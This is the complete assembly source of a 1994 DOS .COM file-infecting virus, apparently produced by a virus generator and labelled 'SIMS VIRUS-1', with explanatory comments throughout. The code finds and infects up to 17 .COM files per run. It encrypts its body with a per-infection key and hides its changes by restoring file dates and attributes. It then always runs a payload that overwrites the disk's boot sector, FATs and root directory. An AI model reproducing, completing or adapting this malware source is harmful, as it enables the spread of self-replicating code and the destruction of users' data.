;-----------------------------------------------------------------------
;
;             METRiC BUTTLOAD of CODE GENERATOR
;
;             Copyright(c) 1994 - MBC - Ver. 0.91b
;
;-----------------------------------------------------------------------

; Assembler: MASM/TASM-style 16-bit DOS source (.MODEL/.CODE/ORG, DB/DW,
; WORD PTR).  Built as a .COM image: ORG 100H, one segment, entry at
; ENTRY_POINT.  This file is a DOS .COM file infector with a destructive
; payload (see ACTIVATE); the comments below describe what the visible
; code does so an analyst can read it straight through.
.MODEL TINY
.CODE
ORG 100H
; First three bytes of the image: E9 xx xx = JMP rel16.  In the carrier
; the displacement is 0, so control falls through to DECRYPT.  INFECT_COM
; writes the same E9 + displacement over the first three bytes of a
; victim so that the host starts at the appended virus body.
ENTRY_POINT: DB 0E9H,0,0

;-----------------------------------------------------------------------
; DECRYPT - self-modifying decryptor that precedes the encrypted body.
; Per infection, INFECT_COM rewrites three things in this region:
; DECRYPT_VALUE (the key), the ModRM byte at DECRYPT_LOOP+1 (ADD <-> SUB
; via XOR 028h) and the immediate at PATCH_STARTENCRYPT+1 (where the body
; will lie inside the victim).  Every byte offset here is load-bearing;
; the instructions must keep exactly this encoding and order.
;-----------------------------------------------------------------------
DECRYPT:
        ; Word count of the encrypted region (STARTENCRYPT..HEAP).  BP is
        ; reloaded by the very next instruction, so this value is not used
        ; by the loop as written.
        MOV BP,(OFFSET HEAP - OFFSET STARTENCRYPT)/2
PATCH_STARTENCRYPT:
        ; BP = start of the encrypted body; the immediate (at
        ; PATCH_STARTENCRYPT+1) is patched by INFECT_COM for each victim.
        MOV bp,OFFSET STARTENCRYPT
DECRYPT_LOOP:
        ; Hand-encoded so the ModRM byte at DECRYPT_LOOP+1 (46h) can be
        ; toggled to SUB WORD PTR [bp],xxxx by XOR 028h (see INFECT_COM).
        DB 81h,46h,0 ; ADD WORD PTR [bp], xxxx
        ; Immediate operand of the ADD/SUB above = per-infection key
        ; (taken from the system time in INFECT_COM).
DECRYPT_VALUE DW 0
        ; Net effect of the next three instructions is BP = BP + 1; the
        ; loop only exits when DEC BP leaves BP at zero.
        inc bp
        inc bp
        DEC BP
        JNZ DECRYPT_LOOP

;-----------------------------------------------------------------------
; STARTENCRYPT - start of the region stored encrypted in victims; also the
; first instruction executed once the DECRYPT loop falls through.  Relies
; on the .COM convention that CS, DS, ES and SS are one segment.
;-----------------------------------------------------------------------
STARTENCRYPT:
        ; Delta-offset trick: BP = (run-time address of NEXT) - (assembled
        ; OFFSET NEXT), so [BP+label] reaches virus data wherever the body
        ; was appended in the host.
        CALL NEXT
NEXT:   POP BP
        SUB BP,OFFSET NEXT

        ; Put the host's original first three bytes (saved in SAVE3 at
        ; infection time) back over the JMP at CS:100H, and push 100H so
        ; the RETN at EXIT_VIRUS transfers control to the repaired host.
        LEA SI,[BP+SAVE3]
        MOV DI,100H
        PUSH DI
        MOVSW
        MOVSB

        ; At most 17 files are infected per run (counted down at the end
        ; of FINISHINFECTION).
        MOV BYTE PTR [BP+NUMINFEC],17

        ; INT 21H/AH=1AH: point the DTA at the virus's own NEWDTA buffer so
        ; FindFirst/FindNext results land inside the virus image.
        MOV AH,1AH
        LEA DX,[BP+NEWDTA]
        INT 21H

        ; INT 21H/AH=4EH FindFirst on COM_MASK ('*.?OM') in the current
        ; directory; CX=7 = attribute mask that also matches read-only,
        ; hidden and system files.  FIND_NEXT re-enters the loop with AH=4FH.
        LEA DX,[BP+COM_MASK]
        MOV AH,4EH
        MOV CX,7
FINDFIRSTNEXT:
        INT 21H
        JC DONE_INFECTIONS      ; CF set = no (more) matches

        ; Open the candidate read-only (AL=0 access mode; OPEN leaves the
        ; handle in BX) and read its first 1AH (26) bytes into BUFFER for
        ; the checks in CHECKCOM.
        MOV AL,0H
        CALL OPEN

        MOV AH,3FH
        LEA DX,[BP+BUFFER]
        MOV CX,1AH
        INT 21H

        ; INT 21H/AH=3EH: close the handle in BX.
        MOV AH,3EH
        INT 21H

;-----------------------------------------------------------------------
; CHECKCOM - decide whether the file described in NEWDTA is a usable
; victim.  DOS FindFirst DTA fields used (offsets from NEWDTA): 15h
; attribute byte, 16h time, 18h date, 1Ah size (low word), 30 (1Eh)
; ASCIIZ name.  Jumps to INFECT_COM on success, otherwise to FIND_NEXT.
;-----------------------------------------------------------------------
CHECKCOM:
        ; Skip names whose 6th and 7th characters are "ND" (word at
        ; NEWDTA+35 = name+5), i.e. COMMAND.COM.  'DN' is the word constant
        ; whose little-endian bytes in memory are 'N','D'.
        MOV AX,WORD PTR [BP+NEWDTA+35]
        CMP AX,'DN'
        JZ FIND_NEXT

        ; Size limits: skip files smaller than 1430 bytes ...
        MOV AX,WORD PTR [BP+NEWDTA+1AH]
        CMP AX,1430
        JB FIND_NEXT

        ; ... and files so large that the appended body would not fit in
        ; the 64K .COM segment.
        CMP AX,65535-(ENDHEAP-DECRYPT)
        JA FIND_NEXT

        ; Already-infected test: if the JMP displacement at BUFFER+1 plus
        ; the virus length (HEAP-DECRYPT) plus 3 equals the file size, the
        ; entry JMP already targets a body of this length at end of file.
        MOV BX,WORD PTR [BP+BUFFER+1]
        ADD BX,HEAP-DECRYPT+3
        CMP AX,BX
        JE FIND_NEXT
        JMP INFECT_COM
FIND_NEXT:
        ; INT 21H/AH=4FH FindNext, issued by the INT 21H at FINDFIRSTNEXT.
        MOV AH,4FH
        JMP SHORT FINDFIRSTNEXT

DONE_INFECTIONS:
        ; The payload runs unconditionally once the infection loop ends;
        ; no trigger condition (date, counter, etc.) is visible.
        JMP ACTIVATE
EXIT_VIRUS:
        ; INT 21H/AH=1AH: restore the default DTA at PSP:80H, then RETN to
        ; the 100H pushed in STARTENCRYPT, i.e. start the repaired host.
        MOV AH,1AH
        MOV DX,80H
        INT 21H
        RETN
        ; The host's original first three bytes, copied here by INFECT_COM
        ; before its entry JMP is written.  In the carrier they are INT 20H
        ; (terminate) plus a pad byte, so the carrier simply exits.
SAVE3 DB 0CDH,20H,0

ACTIVATE:
;-----------------------------------------------------------------------
;             LITTLE FRISKIES SMOKE 'EM ROUTINE!
;-----------------------------------------------------------------------
; Destructive payload.  PROC/ENDP emit no code, so control from ACTIVATE
; falls straight through the body below and on to JMP EXIT_VIRUS.
; (PROC-before-name is TASM Ideal-mode ordering; MASM expects
; "BLISTER_LIPS PROC" -- presumably assembled with TASM.)
PROC BLISTER_LIPS
        PUSH DX
        ; INT 26H = absolute disk write: AL = drive number, CX = sector
        ; count, DX = first logical sector, DS:BX = data.  The drive is
        ; whatever DL held on arrival and BX is not set here, so 255
        ; sectors from logical sector 0 -- on a DOS volume the boot sector,
        ; FATs and root directory -- are overwritten with arbitrary memory.
        MOV AL,DL
        MOV CX,255
        XOR DX,DX
        INT 26H
        ; INT 26H returns with the flags word still on the stack; drop it.
        ADD SP,2
        POP DX
ENDP BLISTER_LIPS

        JMP EXIT_VIRUS

;-----------------------------------------------------------------------
; INFECT_COM - append the virus to the file described in NEWDTA.  On
; entry AX = victim size (from CHECKCOM) and BUFFER = its first 1AH bytes.
; Outline: build a JMP to the future body, write it over the first three
; bytes, seek to EOF, pick a key, assemble a throw-away routine in
; CODE_STORE (transform body in place / write image / inverse transform),
; CALL it, then restore the file's time, date and attributes.
;-----------------------------------------------------------------------
INFECT_COM:
        ; JMP rel16 displacement = size - 3 (relative to the end of the
        ; 3-byte JMP at offset 100H).
        MOV CX,3
        SUB AX,CX
        ; Save the host's original 3 bytes into SAVE3 (they travel with the
        ; body and are put back by STARTENCRYPT), then overwrite the copy in
        ; BUFFER with E9 + displacement.  After MOVSW/MOVSB, SI = BUFFER+3.
        LEA SI,[BP+OFFSET BUFFER]
        LEA DI,[BP+OFFSET SAVE3]
        MOVSW
        MOVSB
        MOV BYTE PTR [SI-3],0E9H
        MOV WORD PTR [SI-2],AX
        ; AX = 100H + size = offset of DECRYPT inside the infected image;
        ; kept on the stack until it is popped into DX further down.
        ADD AX,103H
        PUSH AX
FINISHINFECTION:
        ; Clear the attributes (CX=0) so a read-only victim can be opened
        ; for writing; the original byte is restored at the end.
        PUSH CX
        XOR CX,CX
        CALL ATTRIBUTES

        ; Open read/write (AL=2); handle in BX.
        MOV AL,2
        CALL OPEN

        ; INT 21H/AH=40H: write the 3-byte JMP from BUFFER at file offset 0
        ; (CX = 3, restored from the push above).
        MOV AH,40H
        LEA DX,[BP+BUFFER]
        POP CX
        INT 21H

        ; INT 21H/AX=4202H: seek to end of file (CX:DX = 0).
        MOV AX,4202H
        XOR CX,CX
        CWD ; XOR DX,DX
        INT 21H

        ; INT 21H/AH=2CH get time; DX (seconds/hundredths) becomes the key
        ; stored in the decryptor's immediate.
        MOV AH,2CH
        INT 21H
        MOV [BP+DECRYPT_VALUE],DX
        ; Assemble in CODE_STORE: PUSH BP / PUSH BX (bytes 55h 53h) ...
        LEA DI,[BP+CODE_STORE]
        MOV AX,5355H
        STOSW
        ; ... copy #1 of the decryptor (current ADD/SUB opcode, new key) ...
        LEA SI,[BP+DECRYPT]
        MOV CX,STARTENCRYPT-DECRYPT
        PUSH SI
        PUSH CX
        REP MOVSB

        ; Toggle the live decryptor between ADD and SUB (ModRM 46h <-> 6Eh)
        ; so the copy written to the victim inverts what copy #1 does.
        XOR BYTE PTR [BP+DECRYPT_LOOP+1],028h ; flip between add/sub

        ; ... the WRITE fragment (pops BX/BP, writes DECRYPT..HEAP, pushes
        ; them back) ...
        LEA SI,[BP+WRITE]
        MOV CX,ENDWRITE-WRITE
        REP MOVSB
        POP CX
        POP SI
        POP DX                  ; DX = offset of DECRYPT in the victim (the AX pushed above)
        PUSH DI
        PUSH SI
        PUSH CX
        ; ... copy #2 of the decryptor (toggled opcode) ...
        REP MOVSB
        ; ... POP BP / POP BX (bytes 5Dh 5Bh) and RET (C3h).
        MOV AX,5B5DH
        STOSW
        MOV AL,0C3H
        STOSB

        ; Patch the live decryptor so its MOV bp,... points at STARTENCRYPT
        ; as it will lie in the victim, then run the assembled routine:
        ; copy #1 (with its own pre-patch immediate) transforms the body in
        ; memory, WRITE sends DECRYPT..HEAP to the file, copy #2 applies the
        ; inverse operation.  Both copies were taken before this patch.
        ADD DX,OFFSET STARTENCRYPT - OFFSET DECRYPT
        MOV WORD PTR [BP+PATCH_STARTENCRYPT+1],DX
        CALL CODE_STORE
        ; Re-copy the (now toggled and patched) live decryptor over the
        ; copy #2 slot; the purpose is not evident from this file.
        POP CX
        POP DI
        POP SI
        REP MOVSB

        ; INT 21H/AX=5701H: put back the victim's original time (CX) and
        ; date (DX) from the DTA so the modification stamp is unchanged.
        MOV AX,5701H
        MOV CX,WORD PTR [BP+NEWDTA+16H]
        MOV DX,WORD PTR [BP+NEWDTA+18H]
        INT 21H

        MOV AH,3EH              ; close the handle in BX
        INT 21H

        ; Restore the original attribute byte from the DTA.
        MOV CH,0
        MOV CL,BYTE PTR [BP+NEWDTA+15h]
        CALL ATTRIBUTES

        ; Count down the per-run infection budget set in STARTENCRYPT.
        DEC BYTE PTR [BP+NUMINFEC]
        JNZ MO_INFECTIONS
        JMP DONE_INFECTIONS
MO_INFECTIONS: JMP FIND_NEXT

;-----------------------------------------------------------------------
; OPEN - INT 21H/AH=3DH open the file named in the DTA (NEWDTA+30).
; In:  AL = access mode set by the caller (0 read-only, 2 read/write),
;      BP = delta offset.
; Out: BX = handle.  CF is not checked; on failure BX receives the DOS
;      error code and the callers use it as a handle anyway.
; Clobbers: AX, DX.
;-----------------------------------------------------------------------
OPEN:
        MOV AH,3DH
        LEA DX,[BP+NEWDTA+30]
        INT 21H
        XCHG AX,BX
        RET

;-----------------------------------------------------------------------
; ATTRIBUTES - INT 21H/AX=4301H set the attributes of the file named in
; the DTA (NEWDTA+30) to CX.  Called with CX=0 to strip read-only before
; writing and later with the saved attribute byte to put it back.
; No error check.  Clobbers: AX, DX.
;-----------------------------------------------------------------------
ATTRIBUTES:
        MOV AX,4301H
        LEA DX,[BP+NEWDTA+30]
        INT 21H
        RET

;-----------------------------------------------------------------------
; WRITE..ENDWRITE - code fragment copied into CODE_STORE by INFECT_COM,
; never executed from here.  It runs between two decryptor copies whose
; MOV bp,... clobbers BP, so it pops the BX (file handle) and BP (delta)
; that CODE_STORE pushed, writes the image DECRYPT..HEAP to the file via
; INT 21H/AH=40H, and pushes them back for the final POP BP / POP BX / RET.
;-----------------------------------------------------------------------
WRITE:
        POP BX
        POP BP
        MOV AH,40H
        LEA DX,[BP+DECRYPT]
        MOV CX,HEAP-DECRYPT
        INT 21H
        PUSH BX
        PUSH BP
ENDWRITE:

; Constant strings.  COM_MASK is the FindFirst pattern ('*.?OM' matches
; .COM names).  MACHINE, VIRUSNAME and USER are not referenced by any
; code but are written to every victim as part of DECRYPT..HEAP; they lie
; inside the encrypted region, so on disk in a victim they appear under
; the per-infection ADD/SUB transform and in plain form only in memory.
COM_MASK DB '*.?OM',0
MACHINE DB '-=MBC=-',0
VIRUSNAME DB 'SIMS VIRUS-1',0
USER DB 'White Shark',0

; Uninitialised work area.  It follows HEAP, so it is not part of the
; HEAP-DECRYPT bytes written to victims; each copy uses fresh memory past
; its body in the host's segment.
HEAP:

; Scratch area where INFECT_COM assembles its throw-away routine.  The
; size covers two decryptor copies, the WRITE fragment and the RET; the
; routine actually stored also includes PUSH BP/PUSH BX and POP BP/POP BX
; (4 more bytes), so its tail lands in the first bytes of NEWDTA.
CODE_STORE: DB (STARTENCRYPT-DECRYPT)*2+(ENDWRITE-WRITE)+1 DUP (?)
; 43-byte Disk Transfer Area for FindFirst/FindNext.
NEWDTA DB 43 DUP (?)
; Remaining infections allowed this run (initialised to 17).
NUMINFEC DB ?
; First 1AH bytes of the candidate file (read in STARTENCRYPT).
BUFFER DB 1AH DUP (?)
ENDHEAP:
END ENTRY_POINT